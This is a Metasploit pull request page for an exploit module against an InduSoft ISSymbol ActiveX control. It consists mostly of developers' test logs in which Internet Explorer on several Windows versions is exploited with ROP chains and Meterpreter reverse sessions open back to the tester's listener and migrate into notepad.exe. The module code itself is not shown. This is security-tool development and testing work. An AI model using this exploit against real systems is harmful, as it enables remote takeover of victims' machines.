Indusoft issymbol internationalseparator #1183

Merged

jvazquez-r7

Initial submission by James Fitts

Some testing:

[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Target selected as: IE 9 on Windows 7
[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Using JRE ROP
[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.137:49477) at 2012-12-18 21:58:52 +0100
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.137:49477) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (992)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3240
[+] Successfully migrated to process 
[*] 192.168.1.137 - Meterpreter session 1 closed.  Reason: Died

msf  exploit(indusoft_issymbol_internationalseparator) > 
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Using msvcrt ROP
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.147:1193) at 2012-12-18 22:48:31 +0100
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.147:1193) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (220)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3508
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 2 closed.  Reason: Died
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Using msvcrt ROP
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Using msvcrt ROP
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.147:1205) at 2012-12-18 22:49:28 +0100
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.147:1205) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3300
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 3 closed.  Reason: Died
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 7 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.147:1055) at 2012-12-18 23:45:18 +0100
[*] Session ID 4 (192.168.1.128:4444 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1936)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3272
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 4 closed.  Reason: Died

msf  exploit(indusoft_issymbol_internationalseparator) > 
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 6 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.147:1261) at 2012-12-18 23:46:09 +0100
[*] Session ID 5 (192.168.1.128:4444 -> 192.168.1.147:1261) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (2696)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2748
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 5 closed.  Reason: Died

msf  exploit(indusoft_issymbol_internationalseparator) > exit 

@wchen-r7

msf exploit(indusoft_issymbol_internationalseparator) > [*] Server started.
[*] 10.0.1.7 indusoft_issymbol_internationalseparator - Requesting: /FvoKg6
[*] 10.0.1.7 indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows 7
[*] 10.0.1.7 indusoft_issymbol_internationalseparator - Using JRE ROP
[*] 10.0.1.7 indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.7:49166) at 2012-12-18 19:01:03 -0600
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.7:49166) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3448)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3868
[+] Successfully migrated to process

@wchen-r7 wchen-r7 merged commit f820ffb into rapid7:master Dec 19, 2012
@jvazquez-r7 jvazquez-r7 deleted the indusoft_issymbol_internationalseparator branch November 18, 2014 15:49